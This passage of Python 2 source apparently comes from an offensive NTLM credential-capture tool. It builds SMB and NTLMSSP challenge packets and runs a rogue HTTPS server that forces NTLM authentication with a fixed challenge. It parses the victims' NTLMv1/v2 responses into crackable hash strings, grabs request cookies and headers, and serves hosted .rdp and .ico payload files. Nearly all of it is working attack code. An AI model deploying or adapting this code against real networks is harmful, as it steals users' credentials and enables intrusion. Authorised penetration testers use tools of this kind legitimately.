str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
1107 |         AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
1108 |         AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
1109 |         MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])
1110 |         Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])
1111 | 
1112 |         self.fields["Bcc"] = struct.pack("<h",len(CompleteBCCLen1))
1113 |         self.fields["InitContextTokenASNLen"] = struct.pack("<B", len(AsnLenStart))
1114 |         self.fields["ThisMechASNLen"] = struct.pack("<B", len(str(self.fields["ThisMechASNStr"])))
1115 |         self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2))
1116 |         self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2)-2)
1117 |         self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen))
1118 |         self.fields["NegThisMechASNLen"] = struct.pack("<B", len(MechTypeLen)-2)
1119 |         self.fields["NegThisMech1ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech1ASNStr"])))
1120 |         self.fields["NegThisMech2ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech2ASNStr"])))
1121 |         self.fields["NegThisMech3ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech3ASNStr"])))
1122 |         self.fields["NegThisMech4ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech4ASNStr"])))
1123 |         self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len))
1124 |         self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len)-2)
1125 |         self.fields["NegHintFinalASNLen"] = struct.pack("<B", len(str(self.fields["NegHintFinalASNStr"])))
1126 | 
1127 | class SMBSession1Data(Packet):
1128 |     fields = OrderedDict([
1129 |         ("Wordcount",             "\x04"),
1130 |         ("AndXCommand",           "\xff"),
1131 |         ("Reserved",              "\x00"),
1132 |         ("Andxoffset",            "\x5f\x01"),
1133 |         ("Action",                "\x00\x00"),
1134 |         ("SecBlobLen",            "\xea\x00"),
1135 |         ("Bcc",                   "\x34\x01"),
1136 |         ("ChoiceTagASNId",        "\xa1"),
1137 |         ("ChoiceTagASNLenOfLen",  "\x81"),
1138 |         ("ChoiceTagASNIdLen",     "\x00"),
1139 |         ("NegTokenTagASNId",      "\x30"),
1140 |         ("NegTokenTagASNLenOfLen","\x81"),
1141 |         ("NegTokenTagASNIdLen",   "\x00"),
1142 |         ("Tag0ASNId",             "\xA0"),
1143 |         ("Tag0ASNIdLen",          "\x03"),
1144 |         ("NegoStateASNId",        "\x0A"),
1145 |         ("NegoStateASNLen",       "\x01"),
1146 |         ("NegoStateASNValue",     "\x01"),
1147 |         ("Tag1ASNId",             "\xA1"),
1148 |         ("Tag1ASNIdLen",          "\x0c"),
1149 |         ("Tag1ASNId2",            "\x06"),
1150 |         ("Tag1ASNId2Len",         "\x0A"),
1151 |         ("Tag1ASNId2Str",         "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
1152 |         ("Tag2ASNId",             "\xA2"),
1153 |         ("Tag2ASNIdLenOfLen",     "\x81"),
1154 |         ("Tag2ASNIdLen",          "\xED"),
1155 |         ("Tag3ASNId",             "\x04"),
1156 |         ("Tag3ASNIdLenOfLen",     "\x81"),
1157 |         ("Tag3ASNIdLen",          "\xEA"),
1158 |         ("NTLMSSPSignature",      "NTLMSSP"),
1159 |         ("NTLMSSPSignatureNull",  "\x00"),
1160 |         ("NTLMSSPMessageType",    "\x02\x00\x00\x00"),
1161 |         ("NTLMSSPNtWorkstationLen","\x1e\x00"),
1162 |         ("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
1163 |         ("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
1164 |         ("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
1165 |         ("NTLMSSPNtServerChallenge","\x81\x22\x33\x34\x55\x46\xe7\x88"),
1166 |         ("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
1167 |         ("NTLMSSPNtTargetInfoLen","\x94\x00"),
1168 |         ("NTLMSSPNtTargetInfoMaxLen","\x94\x00"),
1169 |         ("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"),
1170 |         ("NegTokenInitSeqMechMessageVersionHigh","\x05"),
1171 |         ("NegTokenInitSeqMechMessageVersionLow","\x02"),
1172 |         ("NegTokenInitSeqMechMessageVersionBuilt","\xce\x0e"),
1173 |         ("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
1174 |         ("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
1175 |         ("NTLMSSPNtWorkstationName","SMB12"),
1176 |         ("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"),
1177 |         ("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"),
1178 |         ("NTLMSSPNTLMChallengeAVPairsUnicodeStr","SMB12"),
1179 |         ("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"),
1180 |         ("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"),
1181 |         ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr","SMB12"),
1182 |         ("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"),
1183 |         ("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"),
1184 |         ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr","SMB12"),
1185 |         ("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"),
1186 |         ("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"),
1187 |         ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr","SMB12"),
1188 |         ("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"),
1189 |         ("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"),
1190 |         ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr","SMB12"),
1191 |         ("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"),
1192 |         ("NTLMSSPNTLMChallengeAVPairs6Len","\x00\x00"),
1193 |         ("NTLMSSPNTLMPadding",             ""),
1194 |         ("NativeOs","Windows Server 2003 3790 Service Pack 2"),
1195 |         ("NativeOsTerminator","\x00\x00"),
1196 |         ("NativeLAN", "Windows Server 2003 5.2"),
1197 |         ("NativeLANTerminator","\x00\x00"),
1198 |     ])
1199 | 
1200 | 
1201 |     def calculate(self):
1202 |         ###### Convert strings to Unicode
1203 |         self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le')
1204 |         self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
1205 |         self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
1206 |         self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
1207 |         self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
1208 |         self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
1209 |         self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
1210 |         self.fields["NativeLAN"] = self.fields["NativeLAN"].encode('utf-16le')
1211 | 
1212 |         ###### SecBlobLen Calc:
1213 |         AsnLen = str(self.fields["ChoiceTagASNId"])+str(self.fields["ChoiceTagASNLenOfLen"])+str(self.fields["ChoiceTagASNIdLen"])+str(self.fields["NegTokenTagASNId"])+str(self.fields["NegTokenTagASNLenOfLen"])+str(self.fields["NegTokenTagASNIdLen"])+str(self.fields["Tag0ASNId"])+str(self.fields["Tag0ASNIdLen"])+str(self.fields["NegoStateASNId"])+str(self.fields["NegoStateASNLen"])+str(self.fields["NegoStateASNValue"])+str(self.fields["Tag1ASNId"])+str(self.fields["Tag1ASNIdLen"])+str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])+str(self.fields["Tag2ASNId"])+str(self.fields["Tag2ASNIdLenOfLen"])+str(self.fields["Tag2ASNIdLen"])+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])
1214 |         CalculateSecBlob = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NTLMSSPNtWorkstationName"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
1215 | 
1216 |         ###### Bcc len
1217 |         BccLen = AsnLen+CalculateSecBlob+str(self.fields["NTLMSSPNTLMPadding"])+str(self.fields["NativeOs"])+str(self.fields["NativeOsTerminator"])+str(self.fields["NativeLAN"])+str(self.fields["NativeLANTerminator"])
1218 | 
1219 |         ###### SecBlobLen
1220 |         self.fields["SecBlobLen"] = struct.pack("<h", len(AsnLen+CalculateSecBlob))
1221 |         self.fields["Bcc"] = struct.pack("<h", len(BccLen))
1222 |         self.fields["ChoiceTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-3)
1223 |         self.fields["NegTokenTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-6)
1224 |         self.fields["Tag1ASNIdLen"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])))
1225 |         self.fields["Tag1ASNId2Len"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2Str"])))
1226 |         self.fields["Tag2ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])))
1227 |         self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob))
1228 | 
1229 |         ###### Andxoffset calculation.
1230 |         CalculateCompletePacket = str(self.fields["Wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["Reserved"])+str(self.fields["Andxoffset"])+str(self.fields["Action"])+str(self.fields["SecBlobLen"])+str(self.fields["Bcc"])+BccLen
1231 |         self.fields["Andxoffset"] = struct.pack("<h", len(CalculateCompletePacket)+32)
1232 | 
1233 |         ###### Workstation Offset
1234 |         CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
1235 | 
1236 |         ###### AvPairs Offset
1237 |         CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
1238 | 
1239 |         ##### Workstation Offset Calculation:
1240 |         self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation))
1241 |         self.fields["NTLMSSPNtWorkstationLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
1242 |         self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
1243 | 
1244 |         ##### IvPairs Offset Calculation:
1245 |         self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
1246 |         self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack("<h", len(CalculateLenAvpairs))
1247 |         self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack("<h", len(CalculateLenAvpairs))
1248 | 
1249 |         ##### IvPair Calculation:
1250 |         self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
1251 |         self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
1252 |         self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
1253 |         self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
1254 |         self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
1255 | 
1256 | 
1257 | 
1258 | def text(txt):
1259 |     if os.name == 'nt':
1260 |         return txt
1261 |     return '\r' + re.sub(r'\[([^]]*)\]', "\033[1;34m[\\1]\033[0m", txt)
1262 | 
1263 | def SaveToDb(result):
1264 |     for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
1265 |         if not k in result:
1266 |             result[k] = ''
1267 |     if len(result['client']):
1268 |         print text("[%s] %s Client   : %s" % (result['module'], result['type'], result['client']))
1269 |     if len(result['hostname']):
1270 |         print text("[%s] %s Hostname : %s" % (result['module'], result['type'], result['hostname']))
1271 |     if len(result['user']):
1272 |         print text("[%s] %s Username : %s" % (result['module'], result['type'], result['user']))
1273 |     
1274 |     # Bu order of priority, print cleartext, fullhash, or hash
1275 |     if len(result['cleartext']):
1276 |         print text("[%s] %s Password : %s" % (result['module'], result['type'], result['cleartext']))
1277 |     elif len(result['fullhash']):
1278 |         print text("[%s] %s Hash     : %s" % (result['module'], result['type'], result['fullhash']))
1279 |     elif len(result['hash']):
1280 |         print text("[%s] %s Hash     : %s" % (result['module'], result['type'], result['hash']))
1281 | 
1282 | 
1283 | # Parse NTLMv1/v2 hash.
1284 | def ParseHTTPHash(data, client):
1285 |     LMhashLen    = struct.unpack('<H',data[12:14])[0]
1286 |     LMhashOffset = struct.unpack('<H',data[16:18])[0]
1287 |     LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
1288 |     
1289 |     NthashLen    = struct.unpack('<H',data[20:22])[0]
1290 |     NthashOffset = struct.unpack('<H',data[24:26])[0]
1291 |     NTHash       = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
1292 |     
1293 |     UserLen      = struct.unpack('<H',data[36:38])[0]
1294 |     UserOffset   = struct.unpack('<H',data[40:42])[0]
1295 |     User         = data[UserOffset:UserOffset+UserLen].replace('\x00','')
1296 | 
1297 |     if NthashLen == 24:
1298 |         HostNameLen     = struct.unpack('<H',data[46:48])[0]
1299 |         HostNameOffset  = struct.unpack('<H',data[48:50])[0]
1300 |         HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
1301 |         WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, "1122334455667788")
1302 | 
1303 |         SaveToDb({
1304 |             'module': 'HTTP', 
1305 |             'type': 'NTLMv1', 
1306 |             'client': client, 
1307 |             'host': HostName, 
1308 |             'user': User, 
1309 |             'hash': LMHash+":"+NTHash, 
1310 |             'fullhash': WriteHash,
1311 |         })
1312 | 
1313 |     if NthashLen > 24:
1314 |         NthashLen      = 64
1315 |         DomainLen      = struct.unpack('<H',data[28:30])[0]
1316 |         DomainOffset   = struct.unpack('<H',data[32:34])[0]
1317 |         Domain         = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
1318 |         HostNameLen    = struct.unpack('<H',data[44:46])[0]
1319 |         HostNameOffset = struct.unpack('<H',data[48:50])[0]
1320 |         HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
1321 |         WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, "1122334455667788", NTHash[:32], NTHash[32:])
1322 | 
1323 |         SaveToDb({
1324 |             'module': 'HTTP', 
1325 |             'type': 'NTLMv2', 
1326 |             'client': client, 
1327 |             'host': HostName, 
1328 |             'user': Domain + '\\' + User,
1329 |             'hash': NTHash[:32] + ":" + NTHash[32:],
1330 |             'fullhash': WriteHash,
1331 |         })
1332 | 
1333 | def GrabCookie(data, host):
1334 |     Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)
1335 | 
1336 |     if Cookie:
1337 |         Cookie = Cookie.group(0).replace('Cookie: ', '')
1338 |         return Cookie
1339 |     return False
1340 | 
1341 | def GrabHost(data, host):
1342 |     Host = re.search(r'(Host:*.\=*)[^\r\n]*', data)
1343 | 
1344 |     if Host:
1345 |         Host = Host.group(0).replace('Host: ', '')
1346 |         return Host
1347 |     return False
1348 | 
1349 | def GrabReferer(data, host):
1350 |     Referer = re.search(r'(Referer:*.\=*)[^\r\n]*', data)
1351 | 
1352 |     if Referer:
1353 |         Referer = Referer.group(0).replace('Referer: ', '')
1354 |         return Referer
1355 |     return False
1356 | 
1357 | def GrabURL(data, host):
1358 |     GET = re.findall(r'(?<=GET )[^HTTP]*', data)
1359 |     POST = re.findall(r'(?<=POST )[^HTTP]*', data)
1360 |     POSTDATA = re.findall(r'(?<=\r\n\r\n)[^*]*', data)
1361 | 
1362 | 
1363 | # Handle HTTP packet sequence.
1364 | def PacketSequence(data, client):
1365 |     global hostedFiles
1366 | 
1367 |     path = "/"
1368 | 
1369 |     searchObj = re.search( r'GET (.*) HTTP.*', data, re.M|re.I)
1370 |     if searchObj:
1371 |         path = searchObj.group(1)
1372 | 
1373 |     feedBody = hostedFiles["/"]
1374 | 
1375 |     if "GET / HTTP" in data:
1376 |         NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
1377 |         if NTLM_Auth:
1378 |             Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
1379 | 
1380 |             if Packet_NTLM == "\x01":
1381 |                 GrabURL(data, client)
1382 |                 GrabReferer(data, client)
1383 |                 GrabHost(data, client)
1384 |                 GrabCookie(data, client)
1385 | 
1386 |                 tmp = "1122334455667788"
1387 |                 Challenge = ""
1388 |                 for i in range(0, len(tmp),2):
1389 |                     Challenge += tmp[i:i+2].decode("hex")
1390 | 
1391 |                 Buffer = NTLM_Challenge(ServerChallenge=Challenge)
1392 |                 Buffer.calculate()
1393 | 
1394 |                 Buffer_Ans = IIS_NTLM_Challenge_Ans()
1395 |                 Buffer_Ans.calculate(str(Buffer))
1396 | 
1397 |                 return str(Buffer_Ans)
1398 | 
1399 |             if Packet_NTLM == "\x03":
1400 |                 NTLM_Auth = b64decode(''.join(NTLM_Auth))
1401 |                 ParseHTTPHash(NTLM_Auth, client)
1402 | 
1403 |                 Buffer = IIS_XML(Payload=feedBody)
1404 |                 Buffer.calculate()
1405 |                 return str(Buffer)
1406 | 
1407 |         else:
1408 |             Response = IIS_Auth_401_Ans()
1409 |             return str(Response)
1410 |     else:
1411 | 
1412 |         if path in hostedFiles:
1413 |             if ".ico" in path:
1414 |                 Buffer = IIS_ICO(Payload=b64decode(hostedFiles[path]))
1415 |                 Buffer.calculate()
1416 |                 return str(Buffer)
1417 |             if ".rdp" in path:
1418 |                 Buffer = IIS_RDP(Payload=hostedFiles[path])
1419 |                 Buffer.calculate()
1420 |                 return str(Buffer)
1421 |         else:
1422 |             Buffer = IIS_Auth_Granted(Payload="foo")
1423 |             Buffer.calculate()
1424 |             return str(Buffer)
1425 | 
1426 | # HTTPS Server class
1427 | class HTTPS(StreamRequestHandler):
1428 |     def setup(self):
1429 |         self.exchange = self.request
1430 |         self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
1431 |         self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
1432 | 
1433 |     def handle(self):
1434 |         while True:
1435 |             try:
1436 |                 data = self.exchange.recv(8092)
1437 |                 self.exchange.settimeout(0.5)
1438 |                 Buffer = PacketSequence(data,self.client_address[0])
1439 |                 self.exchange.send(Buffer)
1440 |             except:
1441 |                 pass
1442 | 
1443 | class ThreadingTCPServer(ThreadingMixIn, TCPServer):
1444 |     def server_bind(self):
1445 |         try:
1446 |             self.socket.setsockopt(socket.SOL_SOCKET, 25, "0.0.0.0"+'\0')
1447 |         except:
1448 |             pass
1449 |         TCPServer.server_bind(self)
1450 | 
1451 | def serve_thread_SSL(host, port, handler, hosted, cert, key):
1452 |     global hostedFiles
1453 |     hostedFiles = hosted
1454 | 
1455 |     server = ThreadingTCPServer(("0.0.0.0", port), handler)
1456 |     server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
1457 |     server.serve_forever()
1458 | 
1459 | 


--------------------------------------------------------------------------------